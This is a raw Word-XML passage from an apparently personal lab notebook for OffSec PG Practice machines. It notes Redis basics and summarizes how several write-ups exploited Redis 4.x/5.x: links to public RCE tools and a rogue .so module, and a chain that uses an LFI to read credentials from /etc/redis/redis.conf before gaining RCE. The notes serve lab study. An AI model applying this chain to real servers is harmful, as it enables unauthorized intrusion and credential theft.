        <w:t xml:space="preserve">Adding key-value pair:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002972">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SET [key] [value]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002973">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ex. SET hello bye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002974">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So here, the key would be "hello" and value is "bye"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002975">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can put the key or value in quotation marks if the key or value contains spaces</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002976">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002977">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Where are Redis Credentials stored:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002978">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="664"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/redis/redis.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002979">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="664"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Seen in </w:t>
      </w:r>
      <w:hyperlink r:id="rId858">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ah4s83keluk1" w:id="358"/>
      <w:bookmarkEnd w:id="358"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis Exploit Example 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from the Wombo PG practice and I put it at the top since it was the most straight forward Redis exploit. They saw Redis 5.0.9 in port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6379 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000297F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId859">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup (my favorite), they clearly explained how the github is not enough and you need an external shared library (.so file) in order to run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002980">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId860">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002981">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The .so file: </w:t>
      </w:r>
      <w:hyperlink r:id="rId861">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/n0b0dyCN/redis-rogue-server/blob/master/exp.so</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002982">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:hyperlink r:id="rId862">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do the same thing but the process they used for creating .so file was a little more complicated</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002983">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The exploit: </w:t>
      </w:r>
      <w:hyperlink r:id="rId863">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002984">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="479"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The github used to make the .so file: </w:t>
      </w:r>
      <w:hyperlink r:id="rId864">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/n0b0dyCN/RedisModules-ExecuteCommand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002985">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002986">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002987">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002988">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rorejl15ud0s" w:id="359"/>
      <w:bookmarkEnd w:id="359"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis Exploit Example 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002989">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:hyperlink r:id="rId865">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They had an LFI exploit from the wordpress plugin. And then they tried using the Redis exploit (</w:t>
      </w:r>
      <w:hyperlink r:id="rId866">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) but it needed authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="322"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit was for Redis 4.x/5.x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So they used LFI to read </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/redis/redis.conf </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which is where the credentials are stored. And then once they had authentication, they ran the exploit to get RCE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000298F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="541"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId867">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/Ridter/redis-rce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002990">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002991">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This other </w:t>
      </w:r>
      <w:hyperlink r:id="rId868">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Readys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice writeup used a different redis exploit but everything was the same</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002992">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1429"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId869">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/n0b0dyCN/redis-rogue-server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002993">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1429"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For Redis(&lt;=5.0.5) RCE</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002994">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d0uj3g7y7wyd" w:id="360"/>
      <w:bookmarkEnd w:id="360"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis Exploit Example 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002995">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002996">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis 5.0.9 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was exploited in </w:t>
      </w:r>
      <w:hyperlink r:id="rId870">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Sybaris</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice. They used FTP for the exploit too. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002997">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="227"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId871">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writeup for it which ran into problems and tried multiple </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002998">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002999">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
